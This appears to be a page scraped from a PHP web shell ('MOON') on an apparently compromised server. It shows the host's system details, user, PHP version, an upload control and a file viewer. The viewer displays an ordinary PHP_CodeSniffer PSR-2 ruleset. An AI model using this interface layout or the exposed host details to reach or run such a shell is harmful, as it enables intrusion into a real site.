MOON
Server: Apache
System: Linux nserver.cafsindia.com 4.18.0-553.104.1.lve.el8.x86_64 #1 SMP Tue Feb 10 20:07:30 UTC 2026 x86_64
User: cafsindia (1002)
PHP: 8.2.30
Disabled: NONE
Upload Files
File: /home/cafsindia/snap.cafsinfotech.in/phpcs.xml
<?xml version="1.0"?>
<ruleset name="PHP_CodeSniffer">
  <description>The PSR-2 coding standard.</description>
  <arg name="tab-width" value="4"/>

  <rule ref="PSR2">
    <exclude name="PSR1.Methods.CamelCapsMethodName"/>
  </rule>

  <file>app</file>
  <file>bootstrap</file>
  <file>config</file>
  <file>database</file>
  <file>resources</file>
  <file>routes</file>
  <file>tests</file>

  <exclude-pattern>bootstrap/cache/*</exclude-pattern>
  <exclude-pattern>bootstrap/autoload.php</exclude-pattern>
  <exclude-pattern>*/migrations/*</exclude-pattern>
  <exclude-pattern>*/seeds/*</exclude-pattern>
  <exclude-pattern>*.blade.php</exclude-pattern>
  <exclude-pattern>*.js</exclude-pattern>
  <exclude-pattern>resources/*</exclude-pattern>

  <arg value="p"/>
</ruleset>